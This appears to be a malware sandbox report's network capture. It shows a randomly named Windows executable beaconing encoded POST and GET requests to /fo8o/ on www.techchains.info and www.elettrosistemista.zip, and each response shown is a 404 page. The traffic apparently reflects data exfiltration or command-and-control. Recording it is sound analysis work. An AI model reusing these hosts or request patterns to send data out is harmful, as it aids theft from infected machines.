                                                                            Nov 22, 2024 07:51:42.053307056 CET1236INData Raw: 6e 74 65 6e 74 2d 6e 65 63 65 73 73 61 72 79 2d 63 6f 6f 6b 69 65 73 2d 72 6f 77 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 65 65 31 65 33 7d 2e 64 69 73 61 62 6c 65 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7a 2d 69 6e 64 65
                                                                            Data Ascii: ntent-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transiti
                                                                            Nov 22, 2024 07:51:42.053319931 CET1236INData Raw: 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 63 6f 6e 74 65 6e 74 3a 22 22 3b 68 65 69 67 68 74 3a 32 36
                                                                            Data Ascii: n:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:be
                                                                            Nov 22, 2024 07:51:42.173207045 CET1236INData Raw: 36 59 65 53 72 72 71 33 57 45 65 5a 38 65 6e 50 56 57 35 63 4e 57 4e 30 58 69 41 52 63 75 57 52 43 52 31 2f 41 34 2b 37 75 44 45 65 41 31 70 72 48 77 3d 3d 22 2c 22 74 69 64 22 3a 33 30 34 39 2c 22 62 75 79 62 6f 78 22 3a 66 61 6c 73 65 2c 22 62
                                                                            Data Ascii: 6YeSrrq3WEeZ8enPVW5cNWN0XiARcuWRCR1/A4+7uDEeA1prHw==","tid":3049,"buybox":false,"buyboxTopic":true,"disclaimer":true,"imprint":false,"searchbox":true,"noFollow":false,"slsh":false,"ppsh":true,"dnhlsh":true,"toSellUrl":"","toSellText":"","searc


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            13192.168.2.45001066.29.149.46805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:51:56.242892981 CET779OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 2b 53 2f 61 53 52 75 44 6a 49 4c 65 52 30 63 34 56 6b 6a 6a 56 4e 64 79 32 5a 68 6a 50 75 73 66 51 3d 3d
                                                                            Data Ascii: Ml18S=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXI+S/aSRuDjILeR0c4VkjjVNdy2ZhjPusfQ==
                                                                            Nov 22, 2024 07:51:57.569866896 CET637INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:51:57 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.45001766.29.149.46805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:51:58.897321939 CET799OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 70 75 76 78 51 56 75 4d 54 6c 45 56 6d 4c 76 34 52 72 53 73 79 31 5a 71 7a 64 6e 4b 6a 59 2f 51 51 3d
                                                                            Data Ascii: Ml18S=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVpuvxQVuMTlEVmLv4RrSsy1ZqzdnKjY/QQ=
                                                                            Nov 22, 2024 07:52:00.185381889 CET637INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:51:59 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.45001866.29.149.46805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:01.553869009 CET10881OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.techchains.info
                                                                            Origin: http://www.techchains.info
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 10302
                                                                            Referer: http://www.techchains.info/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 59 57 44 7a 38 46 78 77 4e 31 67 46 4d 79 78 42 4d 2f 74 4e 50 62 42 6b 57 57 67 36 35 72 57 39 4f 68 53 34 37 52 2b 49 76 2f 74 6c 59 78 46 53 30 52 52 4d 7a 73 32 41 2b 4f 70 6a 76 75 49 4d 42 4c 6f 72 56 6b 36 6f 46 50 36 58 70 72 6d 36 76 4d 62 77 6e 74 34 44 51 71 68 38 63 4e 67 73 67 6b 32 32 38 6b 32 4c 35 50 6e 67 59 79 6f 4f 64 66 6c 6e 46 72 57 37 4d 33 4c 63 46 50 73 78 68 52 66 2b 2f 2f 44 34 64 63 54 77 61 4f 56 4c 68 76 33 65 43 55 5a 71 70 75 73 48 77 79 58 50 77 67 [TRUNCATED]
                                                                            Data Ascii: Ml18S=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVQ3V1wbKu8aVIugQKDj75viGz+K0wn2GvVSBm+rKNQGOLk95nXcQGFEXVqKK52HiJOiH1TnhdY/cJiiPm6zTAhzYeswJsADu9sgMYOqeySQAJBbZVQl5xvePtDWSS9pNnYWDz8FxwN1gFMyxBM/tNPbBkWWg65rW9OhS47R+Iv/tlYxFS0RRMzs2A+OpjvuIMBLorVk6oFP6Xprm6vMbwnt4DQqh8cNgsgk228k2L5PngYyoOdflnFrW7M3LcFPsxhRf+//D4dcTwaOVLhv3eCUZqpusHwyXPwgW6TuK70JeCi9ELbm/JHs5nEZNYt9gINRz/xk4saE+gyfNPVd3USkEHFWiwgLoCdyxMiCnCV8N7vp9jvHuYVFECizejIFUsj1L5awlRSArxkosu88jFosLjjCV7rQpRN0ORDusbVE2SNfVKz2OyNaNQdvD2CWu0KTn2b3qsWvBXgwId92/TbSN8occRSpiyYr1jezk5xorkS1szuFZ/RymGtg/8QkAbBDTGyV4RefsT9vhapIKaqQEEOoeKY/5ZP269UFz+h5ide/dT34BdS9mqqT2UIUly3+AMrUEY30rOFIix6vdECEKy5LB2rpiNOOSVaiXWCgixsCCORrIiVOr3P5e3OV9DPwPyAsbm89NL/G5GEi+zK+YkrbbMcdFfMu1NNykUJeOn8j6mvaCZ8viIlMthIq3jRhpa4WGktmqI9JGAiWfe3RTFf5UoLc/LRdG7NWrwQEHYRtULAb2RmPTJSIhRo3JF+TqzjwKDv6E6/m4JXZju0iG5ZlM4iBaYQ6BAN6HSGPTPiBOfNYSnFlpqkN5mTxHH3dRegdjc9HfvbUxICgg/Zv6i5Vjk5NQIjfwdN4cUtFDB6sbzMnctvq74A7LnkLpf6PVYILwp0uRFKRNJXdXxCqQHmxVOcJAofjqgMSHN/cmP/q8HxjOm4JN1IK4EIjTWHxUR [TRUNCATED]
                                                                            Nov 22, 2024 07:52:03.439923048 CET637INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:02 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.45001966.29.149.46805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:04.249063015 CET515OUTGET /fo8o/?Ml18S=vefd0teQh+kbruh+h6aX8PBfjiL7oFyRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hd7w81ULHWk02cFWPIOqV4u3afmCGnKNzdpU=&nVb4=q2L0IduHqXQ8JBmp HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Host: www.techchains.info
                                                                            Connection: close
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Nov 22, 2024 07:52:05.483556032 CET652INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:05 GMT
                                                                            Server: Apache
                                                                            Content-Length: 493
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.450020195.110.124.133805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:11.506185055 CET797OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 202
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 76 6d 32 51 6e 6b 66 65 70 77 6d 59 51 51 49 75 59 79 6b 47 36 6a 78 58 2b 63 76 52 43 5a 32 50 63 46 4a 72 4d 72 41 4a 43 36 75 58 59 6d 75 39 6a 64 4a 31 34 34 7a 75 7a 2b 41 61 39 38 54 48 42 42 78 47 46 63 4d 7a 4d 33 46 68 63 34 4f 49 2f 6d 37 30 69 66 45 7a 4e 2f 72 72 59 5a 64 79 47 51 6a 37 6c 47 44 77 73 44 61 67 72 6a 66 47 46 6a 45 39 50 77 4b 76 6c 41 2b 6f 36 55 41 6f 66 70 2b 54 36 47 38 6d 32 73 42 73 43 45 72 73 52 67 4e 43 69 78 4e 59 78 49 4d 31 4a 74 4b 41 2f 57 70 73 58 50 78 74 43 78 4c 4c 67 4e 74 47 63 72 37 79 6e 77 3d 3d
                                                                            Data Ascii: Ml18S=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCixNYxIM1JtKA/WpsXPxtCxLLgNtGcr7ynw==
                                                                            Nov 22, 2024 07:52:12.871778965 CET367INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:12 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.450021195.110.124.133805436C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 22, 2024 07:52:14.165221930 CET817OUTPOST /fo8o/ HTTP/1.1
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                            Accept-Language: en-US,en
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Host: www.elettrosistemista.zip
                                                                            Origin: http://www.elettrosistemista.zip
                                                                            Cache-Control: no-cache
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Content-Length: 222
                                                                            Referer: http://www.elettrosistemista.zip/fo8o/
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                            Data Raw: 4d 6c 31 38 53 3d 57 4d 64 30 43 59 78 6c 4c 48 31 6a 75 47 47 51 6d 48 6e 65 68 77 6d 5a 56 51 49 75 53 53 6b 43 36 6a 39 58 2b 64 71 4d 43 73 75 50 66 6c 35 72 65 71 41 4a 46 36 75 58 58 47 75 38 6e 64 4a 71 34 34 2f 51 7a 2f 38 61 39 39 33 48 42 46 31 47 46 72 51 30 50 48 46 6a 58 59 4f 47 69 57 37 30 69 66 45 7a 4e 2b 62 52 59 64 78 79 47 41 7a 37 6b 6e 44 7a 76 44 61 6a 73 6a 66 47 58 54 45 35 50 77 4b 4e 6c 42 7a 39 36 53 45 6f 66 72 6d 54 30 79 67 6c 2f 73 42 71 66 55 71 35 64 77 4d 30 36 52 41 4c 34 75 6b 49 49 4d 65 5a 33 77 34 32 47 2b 51 36 51 78 76 34 39 4b 6b 79 52 6f 47 37 38 34 48 31 4a 4c 6b 48 36 72 2f 74 6c 72 79 79 4c 4b 47 4c 79 70 55 3d
                                                                            Data Ascii: Ml18S=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6Qxv49KkyRoG784H1JLkH6r/tlryyLKGLypU=
                                                                            Nov 22, 2024 07:52:15.474142075 CET367INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 22 Nov 2024 06:52:15 GMT
                                                                            Server: Apache
                                                                            Content-Length: 203
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
